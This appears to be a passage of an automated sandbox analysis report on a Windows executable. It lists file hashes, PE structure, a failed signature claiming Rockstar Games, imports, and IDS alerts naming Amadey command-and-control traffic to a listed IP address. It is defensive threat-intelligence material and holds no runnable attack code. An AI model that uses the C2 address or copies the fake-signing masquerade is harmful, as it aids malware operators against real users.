                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:pTvHtQDXio.exe
                                                File size:14'014'536 bytes
                                                MD5:7c23cca92ddabc20911e0c51e19b002b
                                                SHA1:f0e07a68ca36681ece42c23d75351d51a9b52a8c
                                                SHA256:471f22db8436b846bcc1b8d9691adb74d02cee7b49e4a58772f486ece4ca19db
                                                SHA512:981afbb497ffde188e5134c181f85870ee1da5b9eb4dfda17e33f1b469a5bf76051071c1f37507c3a9bf1c2abe5c15379f1d2bb457d0953242aaba201fe5c3e1
                                                SSDEEP:196608:cbQLsmUzjxbODbedh49KRAg+89tvjXV9nHTDN0JgCDt0IEM:cbAUsWdlRT+wtrXzzwgCh0Ir
                                                TLSH:66E6E113B385613EE46F1E3A487BE624A93F7E217A12CD2B27F4198C4F35640693A747
                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                File Icon

                                                Icon Hash:de9edcdcdc9a9ed8

                                                Static PE Info

                                                General

                                                Entrypoint:0x95a61c
                                                Entrypoint Section:.itext
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x6723E648 [Thu Oct 31 20:19:20 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:b6e2dc6fda6a433b890df57ef17fcdad

                                                Authenticode Signature

                                                Signature Valid:false
                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                Signature Validation Error:The digital signature of the object did not verify
                                                Error Number:-2146869232
                                                Not Before, Not After
                                                • 01/09/2023 02:00:00 01/09/2026 01:59:59
                                                Subject Chain
                                                • CN="Rockstar Games, Inc.", O="Rockstar Games, Inc.", L=New York, S=New York, C=US
                                                Version:3
                                                Thumbprint MD5:ACBF3E7CFB55E946C76DE628B6B4D1C8
                                                Thumbprint SHA-1:774CABFBE0A120481E7EC5A9150326129244DE13
                                                Thumbprint SHA-256:AFF85DE7E9C800198A38B63C5FC4EE09D6ED75A6587E5DE0882A9732B364577C
                                                Serial:043922E28E11D45F73AC1936CE97FC36

                                                Entrypoint Preview

                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                add esp, FFFFFFF0h
                                                mov eax, 009499A0h
                                                call 00007F99206439DDh
                                                push 0095A690h
                                                push 00000000h
                                                push 00000000h
                                                call 00007F992064C4C3h
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                call 00007F992089813Bh
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                mov dl, 01h
                                                call 00007F9920899EA1h
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                mov edx, 0095A6C4h
                                                call 00007F9920897B50h
                                                mov ecx, dword ptr [00983B98h]
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                mov edx, dword ptr [0093DB34h]
                                                call 00007F992089811Ch
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                call 00007F992089826Ch
                                                call 00007F992063BF6Bh
                                                add byte ptr [eax], al
                                                push esi
                                                add byte ptr [edi+00h], cl
                                                push esi
                                                add byte ptr [ebx+00h], dl
                                                dec edi
                                                add byte ptr [esi+00h], al
                                                push esp
                                                add byte ptr [edi+00h], bl
                                                dec edi
                                                add byte ptr [ebx+00h], al
                                                push edx
                                                add byte ptr [edi+00h], bl
                                                push edx
                                                add byte ptr [ebp+00h], ah
                                                popad
                                                add byte ptr [eax+eax+65h], ah
                                                add byte ptr [edx+00h], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                mov al, 04h
                                                add al, byte ptr [eax]

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x5b50000x9b.edata
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5b00000x3fb4.idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x62c0000x1fa217.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xd5b0200x2828
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x5b80000x7357c
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x5b70000x18.rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x5b0b400x9c4.idata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x5b40000xe0c.didata
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x555f3c0x55600064c70b9009ec5cce0ad5a1b5d77ac3d7unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .itext0x5570000x36dc0x380047fbf449b2b2bff640e8ef0433a89a77False0.5050223214285714data6.19341605851024IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .data0x55b0000x2a1240x2a200dc06c5340a642caa892f8777f0fed231False0.3076374721810089data6.093230118790674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .bss0x5860000x2909c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata0x5b00000x3fb40x400043b0270b4d110befabad4bfb8ad09823False0.33038330078125data5.274523560388854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .didata0x5b40000xe0c0x1000cbadc12bfca41b6c546ed38a9ab4bf5fFalse0.303466796875data4.014333875326934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .edata0x5b50000x9b0x2006320216ec133fefb1dabea8863b50092False0.2578125data1.8947667592796267IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .tls0x5b60000x780x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rdata0x5b70000x5d0x200eebedb4f5f94c0780b03eb36a0c3f1faFalse0.189453125data1.370020541144142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x5b80000x735480x73600416488c7609aaf3c310d1bb5b8eb5e46False0.5610526137594799data6.715780364534083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                .rsrc0x62c0000x1fa2170x1fa4002bb856072c65e5c3efe9e50da1ce7f65unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                YOV0x62d7840x11cee7PNG image data, 2688 x 523, 8-bit/color RGB, non-interlacedEnglishUnited States1.0000114440917969
                                                RT_CURSOR0x74a66c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                RT_CURSOR0x74a7a00x134dataEnglishUnited States0.4642857142857143
                                                RT_CURSOR0x74a8d40x134dataEnglishUnited States0.4805194805194805
                                                RT_CURSOR0x74aa080x134dataEnglishUnited States0.38311688311688313
                                                RT_CURSOR0x74ab3c0x134dataEnglishUnited States0.36038961038961037
                                                RT_CURSOR0x74ac700x134dataEnglishUnited States0.4090909090909091
                                                RT_CURSOR0x74ada40x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                RT_BITMAP0x74aed80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                RT_BITMAP0x74b0a80x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                RT_BITMAP0x74b28c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                RT_BITMAP0x74b45c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                RT_BITMAP0x74b62c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                RT_BITMAP0x74b7fc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                RT_BITMAP0x74b9cc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                RT_BITMAP0x74bb9c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                RT_BITMAP0x74bd6c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                RT_BITMAP0x74bf3c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                RT_BITMAP0x74c10c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                RT_BITMAP0x74c1f40x378Device independent bitmap graphic, 110 x 14 x 4, image size 7840.23085585585585586
                                                RT_BITMAP0x74c56c0xd8Device independent bitmap graphic, 15 x 14 x 4, image size 112, resolution 2834 x 2834 px/m0.4675925925925926
                                                RT_ICON0x74c6440x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.45161290322580644
                                                RT_ICON0x74c92c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5168918918918919
                                                RT_ICON0x74ca540xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.427771855010661
                                                RT_ICON0x74d8fc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5546028880866426
                                                RT_ICON0x74e1a40x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.6488439306358381
                                                RT_ICON0x74e70c0x1fbbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8703680906069187
                                                RT_ICON0x7506c80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.07546055739253661
                                                RT_ICON0x7548f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.1412863070539419
                                                RT_ICON0x756e980x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720EnglishUnited States0.18831360946745562
                                                RT_ICON0x7589000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.1796435272045028
                                                RT_ICON0x7599a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.3237704918032787
                                                RT_ICON0x75a3300x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680EnglishUnited States0.3656976744186046
                                                RT_ICON0x75a9e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3696808510638298
                                                RT_DIALOG0x75ae500x52data0.7682926829268293
                                                RT_DIALOG0x75aea40x52data0.7560975609756098
                                                RT_STRING0x75aef80x298data0.44126506024096385
                                                RT_STRING0x75b1900x42cdata0.3202247191011236
                                                RT_STRING0x75b5bc0x400data0.392578125
                                                RT_STRING0x75b9bc0x4b8data0.4105960264900662
                                                RT_STRING0x75be740x1200data0.1853298611111111
                                                RT_STRING0x75d0740x8ecdata0.3397548161120841
                                                RT_STRING0x75d9600x974data0.3202479338842975
                                                RT_STRING0x75e2d40x91cdata0.26286449399656947
                                                RT_STRING0x75ebf00x63cdata0.33395989974937346
                                                RT_STRING0x75f22c0x1f0data0.4435483870967742
                                                RT_STRING0x75f41c0x5d4data0.3445040214477212
                                                RT_STRING0x75f9f00x39cdata0.4253246753246753
                                                RT_STRING0x75fd8c0x46cAmigaOS bitmap font "e", fc_YSize 18176, 20992 elements, 2nd "\034", 3rd "x"0.39664310954063603
                                                RT_STRING0x7601f80x320data0.42375
                                                RT_STRING0x7605180x4a0data0.3918918918918919
                                                RT_STRING0x7609b80x38cdata0.44162995594713655
                                                RT_STRING0x760d440x398data0.3423913043478261
                                                RT_STRING0x7610dc0x2acdata0.46345029239766083
                                                RT_STRING0x7613880x308data0.41494845360824745
                                                RT_STRING0x7616900x2ecdata0.42914438502673796
                                                RT_STRING0x76197c0x448data0.36496350364963503
                                                RT_STRING0x761dc40x8b4data0.3016157989228007
                                                RT_STRING0x7626780xae4data0.2309899569583931
                                                RT_STRING0x76315c0x4dcdata0.3729903536977492
                                                RT_STRING0x7636380x408data0.31589147286821706
                                                RT_STRING0x763a400x3c4data0.41804979253112035
                                                RT_STRING0x763e040x400data0.4140625
                                                RT_STRING0x7642040x48cdata0.39261168384879724
                                                RT_STRING0x7646900x1b0data0.5532407407407407
                                                RT_STRING0x7648400xccdata0.6666666666666666
                                                RT_STRING0x76490c0x17cdata0.5368421052631579
                                                RT_STRING0x764a880x254data0.4865771812080537
                                                RT_STRING0x764cdc0x390data0.38706140350877194
                                                RT_STRING0x76506c0x3c4data0.38070539419087135
                                                RT_STRING0x7654300x448data0.3613138686131387
                                                RT_STRING0x7658780x4c4data0.31721311475409836
                                                RT_STRING0x765d3c0x2c4data0.3559322033898305
                                                RT_STRING0x7660000x40cdata0.3996138996138996
                                                RT_STRING0x76640c0x4b8data0.3509933774834437
                                                RT_STRING0x7668c40x698data0.3033175355450237
                                                RT_STRING0x766f5c0x4a0data0.3293918918918919
                                                RT_STRING0x7673fc0x394data0.38318777292576417
                                                RT_STRING0x7677900x400data0.37890625
                                                RT_STRING0x767b900x350data0.3867924528301887
                                                RT_STRING0x767ee00xd4data0.5283018867924528
                                                RT_STRING0x767fb40xa4data0.6524390243902439
                                                RT_STRING0x7680580x2dcdata0.46311475409836067
                                                RT_STRING0x7683340x458data0.29856115107913667
                                                RT_STRING0x76878c0x31cdata0.42462311557788945
                                                RT_STRING0x768aa80x2e8data0.3736559139784946
                                                RT_STRING0x768d900x34cdata0.3068720379146919
                                                RT_RCDATA0x7690dc0x10data1.5
                                                RT_RCDATA0x7690ec0x1308data0.4755747126436782
                                                RT_RCDATA0x76a3f40x2dataEnglishUnited States5.0
                                                RT_RCDATA0x76a3f80x2355bDelphi compiled form 'TAboutBox'0.9526293606760128
                                                RT_RCDATA0x78d9540x2dbDelphi compiled form 'TAdForm'0.6238030095759234
                                                RT_RCDATA0x78dc300x1b0e3Delphi compiled form 'TAppForm'0.7625046246582264
                                                RT_RCDATA0x7a8d140x3831Delphi compiled form 'TFeedbackForm'0.47493917274939174
                                                RT_RCDATA0x7ac5480xac6Delphi compiled form 'TFormPDF'0.4126178390137781
                                                RT_RCDATA0x7ad0100x7caeDelphi compiled form 'TNagScreen'0.6467823798483614
                                                RT_RCDATA0x7b4cc00xcf8Delphi compiled form 'TNewVer'0.563855421686747
                                                RT_RCDATA0x7b59b80x6fd6cDelphi compiled form 'TTranslateForm'0.15776743536232896
                                                RT_GROUP_CURSOR0x8257240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                RT_GROUP_CURSOR0x8257380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                RT_GROUP_CURSOR0x82574c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_CURSOR0x8257600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_CURSOR0x8257740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_CURSOR0x8257880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_CURSOR0x82579c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_ICON0x8257b00xbcdataEnglishUnited States0.6595744680851063
                                                RT_VERSION0x82586c0x2a0dataEnglishUnited States0.49851190476190477
                                                RT_MANIFEST0x825b0c0x70bXML 1.0 document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.403771491957848

                                                Imports

                                                DLLImport
                                                usp10.dllScriptGetProperties, ScriptItemize, ScriptShape, ScriptLayout, ScriptApplyDigitSubstitution
                                                winmm.dllsndPlaySoundW, timeGetTime
                                                oleacc.dllLresultFromObject
                                                winspool.drvDocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
                                                comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                comctl32.dllImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
                                                shell32.dllDragFinish, DragQueryPoint, DragQueryFileW, DragQueryFileA, DragAcceptFiles, Shell_NotifyIconW, ShellExecuteW
                                                user32.dllCopyImage, SetMenuItemInfoW, GetMenuItemInfoW, SetCaretPos, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, DestroyCaret, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, GetAsyncKeyState, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, NotifyWinEvent, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, IsCharAlphaW, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateWindowExW, ChildWindowFromPoint, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, AnimateWindow, SetTimer, WindowFromPoint, BeginPaint, DrawStateW, RegisterClipboardFormatW, MapVirtualKeyW, OffsetRect, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, CharLowerA, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, CreateCaret, MonitorFromRect, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, EmptyClipboard, GetDlgItem, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, SetKeyboardState, GetKeyboardState, ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CountClipboardFormats, CallWindowProcW, CloseClipboard, DestroyCursor, CopyIcon, PostQuitMessage, ShowScrollBar, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, CharUpperA, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, CharNextA, FindWindowW, GetKeyboardLayout, DeleteMenu
                                                version.dllGetFileVersionInfoSizeW, VerQueryValueW, VerQueryValueA, GetFileVersionInfoW
                                                oleaut32.dllGetErrorInfo, SysFreeString, VariantClear, VariantInit, SysReAllocStringLen, SafeArrayCreate, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, VariantChangeType, VariantCopyInd
                                                advapi32.dllRegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, GetUserNameW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegFlushKey, RegQueryValueExW, RegEnumValueW, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
                                                netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                msvcrt.dllisupper, isalpha, isalnum, toupper, memchr, memcmp, memcpy, memset, isprint, isspace, iscntrl, isxdigit, ispunct, isgraph, islower, tolower
                                                winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                                                kernel32.dllSetFileAttributesW, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, GetSystemTime, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToTzSpecificLocalTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, CreateProcessW, HeapSize, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, GetFileAttributesExW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, GlobalFree, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, UnmapViewOfFile, GlobalHandle, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, EnumResourceNamesW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, CreatePipe, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, RemoveDirectoryW, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                SHFolder.dllSHGetFolderPathW
                                                ole32.dllIsEqualGUID, OleInitialize, CreateStreamOnHGlobal, CLSIDFromProgID, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
                                                gdi32.dllPie, EnumEnhMetaFile, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, CreateDCW, PolyBezierTo, CreateICW, GetStockObject, GetCharABCWidthsW, CreateSolidBrush, GetBkMode, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, SetTextCharacterExtra, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, SetMapMode, GetMapMode, CreateFontIndirectW, PolyBezier, ExtCreatePen, EndDoc, GetObjectW, GetFontData, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, CreateEnhMetaFileW, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, GetTextMetricsA, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, GetCharABCWidthsA, Rectangle, SaveDC, DeleteDC, BitBlt, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, SetWinMetaFileBits, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, SetStretchBltMode, GetDIBits, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetObjectA, GetBrushOrgEx, GetCurrentPositionEx, SetDCPenColor, GetNearestPaletteIndex, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, GetPolyFillMode, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries

                                                Exports

                                                NameOrdinalAddress
                                                TMethodImplementationIntercept30x4e0e90
                                                __dbk_fcall_wrapper20x411be8
                                                dbkFCallWrapperAddr10x989640

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-16T15:26:45.224974+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104971462.60.226.1580TCP
                                                2024-12-16T15:26:45.224974+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.104971462.60.226.1580TCP
                                                2024-12-16T15:26:48.353310+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104971562.60.226.1580TCP
                                                2024-12-16T15:26:51.362062+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104971762.60.226.1580TCP
